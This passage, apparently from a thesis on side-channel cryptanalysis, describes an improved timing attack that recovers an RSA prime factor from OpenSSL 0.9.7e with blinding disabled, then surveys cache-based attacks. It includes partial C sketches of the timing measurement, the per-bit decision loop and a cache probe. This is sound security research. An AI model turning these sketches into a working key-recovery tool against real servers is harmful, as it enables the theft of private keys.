during the exponentiations, because of the conversion into Montgomery form. The
BB-attack does not only compare the timings for gR^{-1} (mod n) and g_hi R^{-1} (mod n)
but uses the whole neighborhoods of g and g_hi, i.e., N(g; N) = {g, g + 1, . . . , g + N − 1}
and N(g_hi; N) = {g_hi, g_hi + 1, . . . , g_hi + N − 1}, respectively. The parameter N is
called the neighborhood size. For details, the reader
is referred to [21].
3.3. Details of Our Approach
Only about 6 out of ca. 1254 Montgomery operations performed in an
RSA exponentiation provide useful information for the BB-attack. On the other hand,
the table initialization phase of the exponentiation modulo q requires 15 Montgomery
multiplications with ȳ_2. Therefore, we exploit these operations in our
attack. In fact, let R_{0.5} = 2^256 = √R, the square root of R over the integers.
Clearly, for input y = u(R_{0.5})^{-1} (mod n) (inverse in the ring Z_n) we have
\[
\bar{y}_{2;q} = MM(\bar{y}_1, \bar{y}_1; q) = u(R_{0.5})^{-1}\, u(R_{0.5})^{-1}\, R \equiv u^2 \pmod{q}. \tag{3.2}
\]
Instead of N(g, N) and N(g_hi, N) we consequently consider the neighborhoods
N(h; N) = {h, h+1, . . . , h+N−1} and N(h_hi; N) = {h_hi, h_hi+1, . . . , h_hi+N−1},
resp., where
\[
h = \lfloor \sqrt{g} \rfloor \quad \text{and} \quad h_{hi} = \lfloor \sqrt{g_{hi}} \rfloor. \tag{3.3}
\]
To be precise, we consider input values y = u(R_{0.5})^{-1} (mod n) with u ∈ N(h; N)
or u ∈ N(h_hi; N). Even if we just directly copy the other steps of the BB-attack,
this will increase the efficiency by a factor of ≈ (15.0/6.2)^2 ≈ 5.8.
Under the assumption from Section 3.1, specifically
Time(MM(a, b; q)) ∈ {c, c + c_ER}
for any a, b ∈ Z_q, we can simply replace the threshold value c_ER log_2(n)√n / (16R)
by 60 c_ER √n / (16R). Clearly, the absolute value of this new threshold is much
smaller, which makes the attack less efficient in terms of the number of necessary
measurements.
The situation in an actual attack is more complicated as pointed out in
[21]. First of all, there are two different integer multiplication algorithms used
to compute MM(a, b; q): Karatsuba’s algorithm (if a and b consist of the same
number of words (nwords)) and the ‘normal’ multiplication algorithm (if a and b
consist of different numbers of words (nwords, mwords)). Karatsuba’s algorithm
has a complexity of O(nwords^{1.58}), whereas the normal multiplication algorithm
requires O(nwords · mwords) operations. Normally, the length of each input
of Montgomery multiplication is 512 bits, therefore Karatsuba’s algorithm is supposed to be applied during RSA exponentiation. However, BB-attack and ours are
chosen-input attacks and some operands may be very small, e.g., ȳ1;q in BB-attack
and ȳ2;q in our attack. Beginning with an index (denoting the actual exponent bit
under attack) near the word size 32, the value of ȳ1;q , resp. ȳ2;q , has leading zero
words so that the program applies normal multiplication.
Unfortunately, the effects of having almost no extra reduction for small
table values but using less efficient integer multiplications counteract each other.
Moreover, the execution time of integer multiplications becomes less and less
during the course of the attack (normal multiplication algorithm!). It is worked
out in [21] that the time differences of integer multiplications depend on the
concrete environment, i.e., compiler options etc. Neither in [21] nor in this chapter
do we assume that the attacker knows all of these details. Instead, robust attack
strategies that work for various settings are used in both cases.
The BB-attack evaluates the absolute values
\[
\Delta_{BB} = \left| \sum_{j=0}^{N-1} \mathrm{Time}\!\left((g+j)R^{-1} \bmod n\right) \;-\; \sum_{j=0}^{N-1} \mathrm{Time}\!\left((g_{hi}+j)R^{-1} \bmod n\right) \right|. \tag{3.4}
\]
∆_BB becomes 'small' when q_k = 1, whereas a 'large' value indicates that q_k = 0
[21]. Our counterpart is
\[
\Delta = \sum_{j=0}^{N-1} \mathrm{Time}\!\left((h+j)(R_{0.5})^{-1} \bmod n\right) \;-\; \sum_{j=0}^{N-1} \mathrm{Time}\!\left((h_{hi}+j)(R_{0.5})^{-1} \bmod n\right), \tag{3.5}
\]
where we omit the absolute value.
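A minimal sketch of computing this neighborhood statistic follows; measure_time() is a hypothetical oracle standing in for the client's round-trip timing of one decryption query, and GMP is used for the multi-word integers.

/* Hedged sketch of the neighborhood statistic Delta from (3.5). */
#include <gmp.h>

extern double measure_time(const mpz_t u);   /* timing oracle (assumed) */

/* Sum the N timings over the neighborhood {base, base+1, ..., base+N-1}. */
static double neighborhood_time(const mpz_t base, unsigned N) {
    double sum = 0.0;
    mpz_t u;
    mpz_init_set(u, base);
    for (unsigned j = 0; j < N; j++) {
        sum += measure_time(u);
        mpz_add_ui(u, u, 1);
    }
    mpz_clear(u);
    return sum;
}

/* Delta = sum over N(h; N) minus sum over N(h_hi; N); a "large" |Delta|
 * suggests q_k = 0, a value near zero suggests q_k = 1. */
double delta(const mpz_t h, const mpz_t h_hi, unsigned N) {
    return neighborhood_time(h, N) - neighborhood_time(h_hi, N);
}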
Since (u + x)^2 − u^2 ≈ 2x√q for u ∈ N(h, N) or u ∈ N(h_hi, N), the value
∆ can only be used to retrieve the bits i ≤ 256 − 1 − log_2(N). In fact, it is
recommended to stop at least two or three bits earlier. The remaining bits
up to the 256th bit of q can be determined either by using the former equation or
by searching exhaustively.
Network traffic and other delays affect timing measurements, because we
can only measure response times rather than mere encryption times. For that
reason, identical input values are queried S many times, where S is one of the
parameters in BB-attack, to decrease the effect of outliers in [21]. We drop this
parameter in our attack, because increasing the number of different queries serves
the same purpose as well.
If ∆_BB or |∆| is 'large' (in relation to the neighborhood size N), that
is, if ∆_BB > N · th_{BB;i}, resp. |∆| > N · th_i, for suitable threshold values th_{BB;i}
and th_i (both depending on the index i), the attacker guesses q_i = 0; otherwise
she decides for q_i = 1.
On the other hand, sequential sampling exploits the fact that already a
fraction of both neighborhood values usually yields the correct decision with high
probability. We can apply a particular decision rule not to sums of timings (i.e.,
to ∆) but successively to individual timing differences
\[
\Delta_j = \mathrm{Time}\!\left((h+j)(R_{0.5})^{-1} \bmod n\right) - \mathrm{Time}\!\left((h_{hi}+j)(R_{0.5})^{-1} \bmod n\right) \tag{3.6}
\]
for j = 0, 1, . . . , N_max. The attacker proceeds until the difference
\[
\#\{\,j \mid \tilde{q}_{i;j} = 0\,\} \;-\; \#\{\,j \mid \tilde{q}_{i;j} = 1\,\} \;\in\; \{m_1, m_2\}, \tag{3.7}
\]
or a given maximum neighborhood size N_max is reached. The term q̃_{i;j} denotes
the j-th individual decision for q_i, and the numbers m_1 < 0 and m_2 > 0 are chosen with
regard to the concrete decision rule. If the process ends at m1 (resp. at m2 ) the
attacker assumes that qi = 1 (resp. that qi = 0) is true. If the process terminates
because the maximum neighborhood size has been exceeded the attacker’s decision
depends on the difference at that time and on the concrete individual decision rule
(cf. [36], Chap. XIV, and [85], Sect. 7).
The fact that the distribution of the differences varies in the course of the
attack causes another difficulty. As pointed out earlier, we do not assume that
the attacker has full knowledge of the implementation details and hence no full
control over the changes of the distribution. A possible individual decision rule
could be, for instance, whether the absolute value of an individual time difference
exceeds a particular bound th_i (→ decision q̃_{i;j} = 0). The attacker updates this
threshold value whenever he assumes that a current bit q_i equals 1. The new
threshold value depends on the old one and the actual normalized value |∆|/N_e,
where N_e denotes the number of exploited individual timing differences.
We use an alternative decision strategy that is closely related to this approach. For k ∈ {0, 1}, we define
\[
f_{i;\ge;k} = \Pr(\Delta_j \ge 0 \mid q_i = k), \tag{3.8}
\]
and similarly
\[
f_{i;<;k} = \Pr(\Delta_j < 0 \mid q_i = k). \tag{3.9}
\]
We want to mention that the following relation surely holds due to the reasons
given above:
\[
\max\{f_{i;\ge;0},\, f_{i;<;0}\} \;>\; \max\{f_{i;\ge;1},\, f_{i;<;1}\}. \tag{3.10}
\]
The right-hand maximum should be close to 0.5. We subtract the number of
negative timing differences from the number of non-negative ones. The process
terminates when this difference equals m1 = −D or m2 = +D > 0, or until a
particular maximum neighborhood size Nmax is reached. For Nmax = ∞, the
process will always terminate at either −D or D. However, the average number of
steps should be smaller when qi = 0, because of the fact highlighted in equation
(3.10). Consequently, if D and Nmax are chosen properly, a termination at D or
−D is a strong indicator for q_i = 0, whereas reaching N_max without termination
indicates that q_i = 1. We use this strategy in our implementation and the results are
presented in §7. We interpret our decision procedure as a classical gambler's ruin
problem. Formula (3.11) below facilitates the selection of suitable parameters D
and N_max. If f_{i;≥;k} ≠ 0.5, formula (3.4) in [36] (Chap. XIV Sect. 3 with z = D,
a = 2D, p = f_{i;≥;k} and q = 1 − p) yields the average number of steps (i.e., number
of time differences to evaluate) until the process terminates at −D or D assuming
N_max = ∞. In fact,
\[
E(\text{Steps}) = \frac{D}{f_{i;<;k} - f_{i;\ge;k}} \;-\; \frac{2D}{f_{i;<;k} - f_{i;\ge;k}} \cdot \frac{1 - \left(f_{i;<;k}/f_{i;\ge;k}\right)^{D}}{1 - \left(f_{i;<;k}/f_{i;\ge;k}\right)^{2D}}. \tag{3.11}
\]
Similarly, formula (3.5) in [36] yields
\[
E(\text{Steps}) = D^2 \quad \text{if } f_{i;\ge;k} = 0.5. \tag{3.12}
\]
These formulae can be used to choose the parameters D and N_max. A deeper
analysis of the gambler's ruin problem can be found in [36], Sect. XIV.
The probabilities f_{i;≥;k} vary with i, and this fact makes the situation more
complicated. On the other hand, if D and Nmax are chosen appropriately, the
decision procedure should be robust against small changes of these probabilities.
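Formula (3.11) can be evaluated directly to pick D and N_max. The short sketch below does so; the probabilities passed in are illustrative values in the spirit of Table 3.3, not measured ones.

/* Hedged sketch: expected number of individual timing differences for the
 * gambler's-ruin decision rule, following formulas (3.11) and (3.12).
 * p plays the role of f_{i;>=;k}. */
#include <math.h>
#include <stdio.h>

static double expected_steps(double p, int D) {
    double q = 1.0 - p;                  /* f_{i;<;k} */
    if (fabs(p - 0.5) < 1e-12)
        return (double)D * (double)D;    /* formula (3.12) */
    double r = q / p;
    return D / (q - p)
         - (2.0 * D / (q - p)) * (1.0 - pow(r, D)) / (1.0 - pow(r, 2.0 * D));
}

int main(void) {
    /* Illustrative probabilities; compare with the q_i = 0 / q_i = 1 columns. */
    printf("p = 0.70, D = 25: E(Steps) = %.1f\n", expected_steps(0.70, 25));
    printf("p = 0.51, D = 25: E(Steps) = %.1f\n", expected_steps(0.51, 25));
    return 0;
}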
3.4. Implementation Details
We performed our attack against OpenSSL version 0.9.7e with disabled
blinding, which would prevent the attack [71]. We implemented a simple TCP
server and a client program, which exchange ASCII strings during the attack. The
server reads the strings sent by the client, converts them to OpenSSL’s internal
representation, and sends a response after decrypting them. The attack is actually
performed by the client, which calculates the values to be decrypted, prepares and
sends the messages, and makes guesses based on the time spent between sending
a message and receiving the response.
We used the GNU Multiple Precision arithmetic library (GMP) to compute
the square roots, i.e., ⌊√g⌋ and ⌊√g_hi⌋ [40]. The source code was compiled using
the gcc compiler with default optimizations. All of the experiments were run
under the configuration shown in Table 3.1. We used random keys generated by
OpenSSL’s key generation routine. We measured the time in terms of clock cycles
using the Pentium cycle counter, which gives a resolution of 3.06 billion cycles
per second. We used the “rdtsc” instruction available in Pentium processors
to read the cycle counter and the “cpuid” instruction to serialize the processor.
Operating System:      RedHat workstation 3
CPU:                   dual 3.06 GHz Xeon
Compiler:              gcc version 3.2.3
Cryptographic Library: OpenSSL 0.9.7e

TABLE 3.1. The configuration used in the experiments
Serialization of the processor was employed for the prevention of out-of-order
execution in order to obtain more reliable timings. Serialization was also used by
Brumley and Boneh in their experiments [21].
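The serialized cycle-counter measurement can be sketched as follows; this is a hedged example using gcc inline assembly on an x86 Pentium-class CPU, and the exact calling overhead will differ between setups.

/* Hedged sketch of serialized timing with cpuid + rdtsc (gcc, x86).
 * cpuid serializes the instruction stream so that out-of-order execution does
 * not blur the measurement; rdtsc then reads the time-stamp counter. */
#include <stdint.h>

static inline uint64_t serialized_rdtsc(void) {
    uint32_t lo, hi;
    __asm__ __volatile__(
        "cpuid\n\t"              /* serialize (outputs of cpuid are discarded) */
        "rdtsc\n\t"              /* EDX:EAX = time-stamp counter               */
        : "=a"(lo), "=d"(hi)
        : "a"(0)
        : "ebx", "ecx", "memory");
    return ((uint64_t)hi << 32) | lo;
}

/* Usage (decrypt() is a placeholder for one decryption query):
 *     uint64_t t0 = serialized_rdtsc();
 *     decrypt(msg);
 *     uint64_t cycles = serialized_rdtsc() - t0;
 */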
There are 2 parameters that determine the total number of queries required
to expose a single bit of q.
• Neighborhood size N_max: We measure the decryption time in the neighborhoods
N(h; N_max) = {h, h+1, . . ., h+N_max−1} and N(h_hi; N_max) = {h_hi,
h_hi + 1, . . ., h_hi + N_max − 1} for each bit of q we want to expose.
• Target difference D: The difference between the number of time differences
that are less than zero and the number of time differences that are larger
than zero. If we reach this difference among N_max many timings, we guess
the value of the bit as 0. Otherwise, our guess becomes q_i = 1.
The total number of queries and the probability of an error for a single
guess depend on these parameters. The sample size used by [21] is no longer a
parameter in our attack. In the following section, we present the results of the
experiments that explore the optimal values for these parameters.
In our attack, we try to expose all of the bits of q between the 5th and the 245th
bit. The first few bits are assumed to be determined in the same way as in [21].
The remaining 11 bits after the 245th bit can be easily found by using either an
exhaustive search or the BB-attack itself.

                      new attack (|∆|/N)                  BB-Attack (∆_BB/N)
interval       bits = 0   bits = 1   0-1 gap      bits = 0   bits = 1   0-1 gap
[5, 31]            5871       3744      2127          3423       2593       830
[32, 63]          42778       4003     38775         15146       3455     11691
[64, 95]          40572       4310     36263         15899       3272     12627
[96, 127]         41307       3995     37313         18886       3580     15306
[128, 159]        45168       2736     42431         20877       2933     17945
[160, 191]        44736       3082     41654         24513       2479     22034
[192, 223]        37141       1755     35385         21550       1977     19573
[224, 245]        21936       2565     19371         27702       4728     22974

TABLE 3.2. Average ∆ and ∆_BB values and 0-1 gaps. The values are given in
terms of clock cycles.
3.5. Experimental Results
In this section we present the results of our experiments in four subsections.
First, we compare our attack to BB-attack. Then, we give the details of our
attack including error probability, parameters and the success rate in the following
subsections. We also show the distribution of the time differences, which is the
basis of our decision strategy.
The characteristics of the decryption time may vary during the course of
the attack, especially around the multiples of the machine word size. Therefore,
we separated the bits of q into different groups, which we call intervals. The
interval [i, j] represents all the bits between the i-th and the j-th bit, inclusive. In our
experiments, we used intervals of 32 bits: [32, 63], [64, 95], etc.
All of the results we present in this paper were obtained by running our
attack as an inter-process attack. It is stated in [21] that it is sufficient to increase
the sample size to convert an inter-process attack into an inter-network attack. In
our case, either a sample size can be used as a third parameter or the neighborhood
size and the target difference can be adjusted to tolerate the network noise.
3.5.1. Comparison of our attack and BB-attack
In [21], Brumley and Boneh calculated the time differences, denoted by
∆BB , for each bit to use as an indicator for the value of the bit. The gap between
∆BB when qi is 0 and when it is 1 is called the zero-one gap in [21]. Therefore, we
want to compare both attacks in terms of the zero-one gap. We ran both attacks on
10 different randomly chosen keys and collected the time differences for each bit in
[5, 245] using a neighborhood size of 5000 and a sample size of 1. Table 3.2 shows
the average statistics of the collected values. The zero-one gap is 114% larger in
our attack, which means a smaller number of queries is required to deduce a key
with ours.
3.5.2. The details of our attack
Our decision strategy for each single bit consists of the following steps (a sketch
follows the list):

• Step 1: Sending the query for a particular neighbor and measuring the time
difference ∆_j.

• Step 2: Comparing ∆_j with zero and updating the difference between the number
of ∆_j values that are less than zero and the number of ∆_j values that
are larger than zero.

• Step 3: Repeating the first two steps until we reach the target difference, D, or a
maximum of N_max times.

• Step 4: Making the guess q_i = 0 if the target difference is reached. Otherwise
the guess becomes q_i = 1.
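The loop below sketches these four steps for a single bit; delta_j() is a hypothetical oracle returning the j-th individual timing difference ∆_j, and D and N_max are the attack parameters of Table 3.4.

/* Hedged sketch of the per-bit sequential decision (Steps 1-4). */
extern double delta_j(unsigned j);    /* j-th individual timing difference (assumed) */

/* Returns the guessed bit: 0 if the target difference D is reached,
 * 1 if N_max timing differences are exhausted first. */
int guess_bit(int D, unsigned N_max) {
    int balance = 0;                   /* (# of Delta_j >= 0) - (# of Delta_j < 0) */
    for (unsigned j = 0; j < N_max; j++) {
        balance += (delta_j(j) >= 0.0) ? 1 : -1;
        if (balance >= D || balance <= -D)
            return 0;                  /* strong drift: guess q_i = 0 */
    }
    return 1;                          /* no clear drift: guess q_i = 1 */
}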
Note that we normally send only one query in Step 1, although we use
a difference of two timings in our decision. This is because one of the timings
we use to compute the difference has to be the one used for the decision of the
previous bit. Since we halve the interval, which q is in, in each decision step,
only one of the bounds, either the upper or lower one, will change. The timings
for the bound that does not change can be reused during the decision process
of the next bit. Therefore, sending one query for a particular neighbor becomes
sufficient by storing the data of the previous iteration. Of course, there are some
cases where we have to send both queries, specifically when we exceed the total
number of neighbors used in the previous decision step. However, just removing
the redundant queries, which can also simply be applied to the BB-attack, almost
doubles the performance.

FIGURE 3.2. The distribution of ∆_j in terms of clock cycles for 0 ≤ j ≤ 5000,
sorted in descending order, for the sample bit q_61. The graph on the left shows
this distribution when q_61 = 1. The distribution on the right is observed when
q_61 = 0.
3.5.2.1. The distribution of time differences
We use the distribution of the time differences for our decision purposes.
Whenever q_i = 1, the numbers of time differences lying above and below zero are very
close to each other. However, when q_i = 0, the difference between these numbers
becomes larger (see Figure 3.2).
interval      max{f_{i;≥;0}, f_{i;<;0}}   max{f_{i;≥;1}, f_{i;<;1}}
[5, 31]              0.5315                      0.5040
[32, 63]             0.6980                      0.5097
[64, 95]             0.7123                      0.5085
[96, 127]            0.7079                      0.5079
[128, 159]           0.7300                      0.5080
[160, 191]           0.7349                      0.5090
[192, 223]           0.6961                      0.5077
[224, 245]           0.6431                      0.5194

TABLE 3.3. The percentage of the majority of time differences that are either
positive or negative (empirical values)
3.5.2.2. Error probabilities and the parameters
When qi = 1, approximately half of the time differences become positive
and the other half become negative. If qi is 0, the majority of the time differences becomes either positive or negative. We determined the percentage of that
majority in order to calculate the error probability for a single time difference.
Table 3.3 shows estimators for max{f_{i;≥;0}, f_{i;<;0}} and max{f_{i;≥;1}, f_{i;<;1}}. These
statistics were obtained using 10 different keys and a neighborhood size of 50000
for [5, 31] and 5000 for other intervals.
The empirical parameters that yield the intended error probabilities are
shown in Table 3.4. We present three different sets of parameters for each accuracy
of 95%, 97.5%, and 99%. We used these parameters to perform our attack on
several different keys. Note that inserting the values of Table 3.3 into formula
(3.11) yields the expected values E(Steps) for qi = 0 and qi = 1, resp. The
probabilities for correct guesses (95%, 97.5%, 99%) were gained empirically.
We employed the concept of 'confirmed intervals' (refer to Section 3.1) to
detect the errors that occurred during the attack. We could recover such errors using
the same concept and could expose each bit of q in the interval [5, 245] of any key
we attacked. Brumley and Boneh used 1.4 million queries in [21] (interprocess
attacks) and they indicated that their attack required nearly 359000 queries in
the more favourable case when the optimizations were turned off by the flag (-g).
We could perform our attack with as few as 47674 queries for a particular
key. The performance of these timing attacks is highly environment-dependent,
therefore it is not reliable to compare the figures of two different attacks on two
different systems. Despite this fact, it is obvious by the arguments explained above
(improving the signal-to-noise ratio (cf. also Table 3.2), reusing previous queries,
sequential sampling) that our attack is significantly better than the previous one.
We performed interprocess attacks. Clearly, in network attacks the noise
(caused by network delay times) may be much larger, and hence an attack may
become impractical even if it is feasible for an interprocess attack under the same
environmental conditions. However, this aspect is not specific for our improved
variant but a general feature that affects BB-attack as well.
interval       Accuracy = 95%               Accuracy = 97.5%              Accuracy = 99%
               parameters   E(Steps) for    parameters   E(Steps) for     parameters   E(Steps) for
               D    N_max   q_i=0  q_i=1    D    N_max   q_i=0  q_i=1     D    N_max   q_i=0  q_i=1
[5, 31]        63   1850      998   3667    68   1975     1077   4220    230   6720     3646  27480
[32, 63]       25    131       63    579    29    163       73    761     34    240       85   1012
[64, 95]       17     67       40    281    36    192       84   1154     46    450      108   1767
[96, 127]      18     70       43    315    26    130       62    640     44    250      105   1674
[128, 159]     16     50       34    250    31    271       67    889     41    299       89   1477
[160, 191]     21    107       44    421    25    127       53    585     29    169       61    771
[192, 223]     24    126       61    551    36    264       91   1179     49    333      124   2033
[224, 245]     30    230      104    636    31    259      108    667     43    365      150   1032

TABLE 3.4. Columns 2 and 3 show the parameters that can be used to yield
the intended accuracy. The last columns give the expected number of steps for
N_max = ∞, calculated using Formula (3.11), to reach the target difference D.

3.6. Conclusion

We have presented a new timing attack against unprotected SSL implementations
of RSA-CRT. Our attack exploits the timing behavior of the Montgomery
multiplications performed during the table initialization phase of the sliding window
exponentiation algorithm. It is an improvement of the Brumley and Boneh attack,
which exploits the Montgomery multiplications in the exponentiation phase of the
same algorithm. Changing the target phase of the attack yields an increase in
the number of multiplications that provide useful information to expose one of
the prime factors of the RSA modulus. This change alone gives an improvement
by a factor of more than 5 over the BB-attack.
We have also presented other possible improvements, including employing
sequential analysis for decision purposes and removing redundant queries, both of
which can also be applied to the BB-attack. Using only the idea of removing
redundant queries from the BB-attack would double its performance by itself. Our
attack brings an overall improvement by a factor of more than 10.
4. SURVEY ON CACHE ATTACKS
As we mentioned earlier in this document, traditional cryptography considers
cryptosystems as perfect mathematical models and deals only with these models.
However, any cryptosystem needs an implementation and a physical device to
run on. The implementations of cryptosystems may leak information through
so-called side channels due to the physical requirements of the device, e.g., power
consumption, electromagnetic emanation and/or execution time. In this chapter,
we focus on a specific type of side-channel attacks that takes advantage of the
information which leaks through the cache architecture of a CPU. To be more
precise, we describe cache-based attacks in the literature.
Timing attacks on various cryptosystems, including RSA and Diffie-Hellman, were introduced in 1996 by Kocher [59]. Several papers have been
published on the subject since then, e.g., [34, 85, 21, 6]. In 1999, Koeune and
Quisquater developed a timing attack on a careless implementation of AES [61],
which has significantly been improved in [88]. A timing attack against RSA on a
smart card was developed in [34]. Various timing attacks were significantly improved or discovered by employing formal statistical models and efficient decision
strategies in [85, 6, 88, 87, 89, 86].
All of the timing attacks mentioned above exploit the variations in execution time caused by running different execution paths due to the conditional
branches, e.g., due to the extra reduction step of Montgomery Multiplication (c.f.
Sections 2.1.3, 3.1, 3.2, and 3.3). However, it is still possible to attack an implementation
even if the execution path is always the same. A cache-based attack,
abbreviated to “cache attack” from here on, exploits the cache behavior of a
cryptosystem by obtaining the execution time and/or power consumption variations
generated via cache hits and misses.
The feasibility of the cache attacks was first mentioned by Kocher and
then Kelsey et al. in [59, 54]. Page described and simulated a theoretical cache
attack on DES [75]. The first actual cache attacks were implemented by Tsunoo
et al. [101, 100]. The main focus of those papers was on DES [20]. Tsunoo et al.
claimed that the search space of the AES key could be narrowed to 32 bits using
cache attacks; however they did not detail their attack.
Bernstein showed the vulnerability of AES by performing a cache attack on
OpenSSL AES implementation [14]. The attack he developed is a template attack
[24] and requires prior knowledge of the timing behavior of the cipher under the
same known key on an identical platform. In this sense, his attack is not very
practical, because the required information is not directly available to an attacker.
Efficient cache attacks on AES were presented by Osvik et al. in [72, 73].
They described and simulated several different methods to perform local cache
attacks. They made use of a local array, and exploited the collisions between AES
table lookups and the accesses to this array. None of their methods can be used
as a remote attack, e.g., an attack over a local network, unless the attacker is able
to manipulate the cache remotely.
None of the mentioned papers, except [14], considered whether a remote
cache attack is feasible. Although Bernstein claimed that his attack revealed the
key of a remote cryptosystem, his experiments were purely local [14]. The server
received the messages, processed them and sent the exact execution time to the
attacker client in his attack model. Therefore, there were neither transmission
delays nor network stack delays in the measurements.
Despite of Bleichenbacher’s attack ( [16]), which exploited weak implementations of the SSL handshake protocol, the vulnerability of software systems
against remote timing attacks was not known until Brumley and Boneh performed
an attack over a local network in ( [21]). They mimicked the attack introduced
in [85] to show that the RSA implementation of OpenSSL [71], which is the most
widely used open-source crypto library, was not immune to such attacks at that
time. An improved version of this attack is introduced in [6] and also given in
Section 3.3.
In this chapter, we give more details of the cache attacks mentioned above.
4.1. The Basics of a Cache Attack
A cache is a small and fast storage area used by the CPU to reduce the
average time to access main memory (c.f. Section 2.3.1). Cryptosystems have
data-dependent memory access patterns. Cache architectures leak information
about the cache hit/miss statistics of ciphers through side channels, e.g., execution
time and power consumption. Therefore, it is possible to exploit cache behavior
of a cipher to obtain information about its memory access patterns, i.e. indices
of S-box and table lookups.
Cache attacks rely on the cache hits and misses that occur during the
encryption / decryption process of the cryptosystem. Even if the same instructions
are executed for any particular (plaintext, cipherkey) pair, the cache behavior
during the execution may cause variations in the program execution time and
power consumption. Cache attacks try to exploit such variations to narrow the
exhaustive search space of secret keys.
Theoretical cache attacks were first described by Page in [75]. Page characterized two types of cache attacks, namely trace-driven and time-driven. In
trace-driven attacks, the adversary is able to obtain a profile of the cache activity of the cipher. This profile includes the outcomes of every memory access the
cipher issues in terms of cache hits and misses. Therefore, the adversary has the
ability to observe (e.g.) if the 2nd access to a lookup table yields a hit and can
infer information about the lookup indices, which are key dependent. This ability
gives an adversary the opportunity to make inferences about the secret key.
Time-driven attacks, on the other hand, are less restrictive since they
do not rely on the ability to capture the outcomes of individual memory accesses.
The adversary is assumed to be able to observe the aggregate profile, i.e., the total
numbers of cache hits and misses, or at least a value that can be used to approximate
these numbers. For example, the total execution time of the cipher can
be measured and used to make inferences about the number of cache misses in a
time-driven cache attack. Time-driven attacks are based on statistical inferences,
and therefore require a much higher number of samples than trace-driven attacks.
We have recently seen another type of cache attack, which can be called an
“access-driven” attack. In these attacks, the adversary can determine the cache
sets that the cipher process modifies. Therefore, he can understand which elements
of the lookup tables or S-boxes are accessed by the cipher. Then, the candidate
keys that cause an access to unaccessed parts of the tables can be eliminated.
In the rest of this section, we present the basic models of cache attacks.
The attacks in the literature are built upon these models.
FIGURE 4.1. Cache Attack Model-1
4.1.1. Basic Attack Models
In this subsection we present two different models that are employed in
various cache attacks in the literature. The first model mainly corresponds to
access-driven cache attacks, while the second model is the basic model of time-driven and trace-driven attacks.
4.1.1.1. Model-1
We use Figure 4.1 to explain this attack model. We have a main memory
that stores data of each process running on the system and a cache between the
memory and the CPU. Each square in the cache represents a cache block and each
column represents a different cache set. For example, this cache has 2 blocks in
each column, so it is 2-way set associative. The blocks in a column of the memory
map only to the corresponding cache set in the same column of the cache. Mapping
a memory block to a cache set means that this particular memory block can only
be stored in that set of the cache. As an example, the garbage data and data
structure 1 can only be in the dark area of the cache in Figure 4.1.
Assume that we have two different processes, the cryptosystem and a malicious
process, called the Spy process, running on the same machine. The cryptosystem
process contains different internal data structures and it accesses some or all of
these data structures, depending on the value of the secret key. The adversary
can easily understand if the cipher has at least one access to data structure 1 during
an encryption, because accesses to the garbage data and data structure 1 create
external collisions.
A collision is the situation that occurs when an attempt is made to store
two or more different data items at a location that can hold only one of them. We
use the term “external collision” if these data items belong to different processes.
On the other hand, if the data items belong to the same process, we call this situation
an “internal collision”.
In our case, the cache cannot store the garbage data and data structure
1 at the same time, so an access to the garbage data may evict data structure 1
from the cache and vice versa. This fact enables an adversary to devise an attack
on the cryptosystem process as follows.
When the adversary reads the garbage data, the CPU loads its content
into the cache (Figure 4.2a). If the cryptosystem is run under this initial cache
state, there are two possible cases:
Case 1: Data structure 1 is accessed by the cipher.
Case 2: Data structure 1 is not accessed by the cipher.
In Case 1 (Case 2, resp.) the final state of the first four cache sets just after
the encryption becomes like Figure 4.2b (Figure 4.2c, resp.). In the first case, the
cipher accesses data structure 1 and this access changes the content of the first four
cache sets as shown in the figure. Otherwise, these sets remain unchanged. When
FIGURE 4.2. Cache states
the adversary reads the garbage data again after the encryption, he can understand
which case was true, because reading the garbage data creates some cache misses
and thus takes longer in Case 1. Similarly, at least in theory, the adversary can
use the same technique for other data structures and reveal the entire set of items
that are accessed during an encryption. Since this set depends on the secret key
value, he can gain invaluable information to narrow the exhaustive search space.
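The core measurement of this model can be sketched as follows; the buffer size, the trigger_encryption() call, and the timing helper are placeholder assumptions used only to illustrate the idea, not code from any of the attacks discussed here.

/* Hedged sketch of the Model-1 measurement: fill the cache, let the cipher
 * run, then re-read and time the fill data. */
#include <stdint.h>

#define GARBAGE_SIZE (64 * 1024)          /* assumed large enough to cover the targeted sets */
static uint8_t garbage[GARBAGE_SIZE];

extern void     trigger_encryption(void); /* makes the victim perform one encryption (assumed) */
extern uint64_t rdtsc_now(void);          /* serialized cycle counter (cf. Chapter 3)          */

/* Returns the time needed to re-read the garbage data after one encryption.
 * A "long" time suggests the cipher touched data mapping to the same cache sets. */
uint64_t probe_once(void) {
    volatile uint8_t sink = 0;

    for (unsigned i = 0; i < GARBAGE_SIZE; i += 64)
        sink ^= garbage[i];               /* step 1: load the garbage data into the cache */

    trigger_encryption();                 /* step 2: run the cipher under this cache state */

    uint64_t t0 = rdtsc_now();
    for (unsigned i = 0; i < GARBAGE_SIZE; i += 64)
        sink ^= garbage[i];               /* step 3: re-read; misses reveal the cipher's accesses */
    return rdtsc_now() - t0;
}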
This model describes an active attack where the adversary must be able to
control the content of the cache. The cache attacks that rely on this basic model
correspond to the access-driven type. Percival's attack on RSA [80] (c.f. Subsection 4.2.4),
OST and Neve et al.'s attacks on AES [72, 73, 67] (c.f. Subsections 4.2.5 and
4.2.6), and the power attack by Bertoni et al. [15] (c.f. Subsection 4.2.7) use this
attack model.
4.1.1.2. Model-2
Assume there are two accesses to the same table as in Figure 4.3. Let
P_i and K_i be the i-th byte of the plaintext and the cipherkey, respectively. In this
paper, each byte is considered to be either an 8-digit radix-2 number, i.e., an element
of {0, 1}^8, that can be added together in GF(2^8) using a bitwise exclusive-or operation,
or an integer in [0, 255] that can be used as an index. For the rest of this paper,
we assume that each plaintext consists of a single message block unless otherwise
stated. The size of the message block depends on the particular cryptosystem in
use, e.g. it is 128, 192, or 256 bits for AES, 64 bits for DES, and usually 512 or
1024 bits for RSA.
The structure shown in the figure uses different bytes of the plaintext and
the cipherkey as inputs to the function that computes the index of each of these
two accesses. If both of them access the same element of the table, the latter
one will find the target data in the cache, resulting in a cache hit, and therefore
requires a shorter execution time. Then, the key byte difference K_1 ⊕ K_2 can be
derived from the values of the plaintext bytes P_1 and P_2 using the equation:
P_1 ⊕ K_1 = P_2 ⊕ K_2 ⇒ P_1 ⊕ P_2 = K_1 ⊕ K_2.
In trace-driven attacks, we already assume that the adversary can directly
understand if the latter access results in a hit, and thus can directly obtain K_1 ⊕ K_2.
This goal is more complicated to achieve in time-driven attacks. We need to use a
large sample to obtain accurate statistics of the execution. In our case, if we
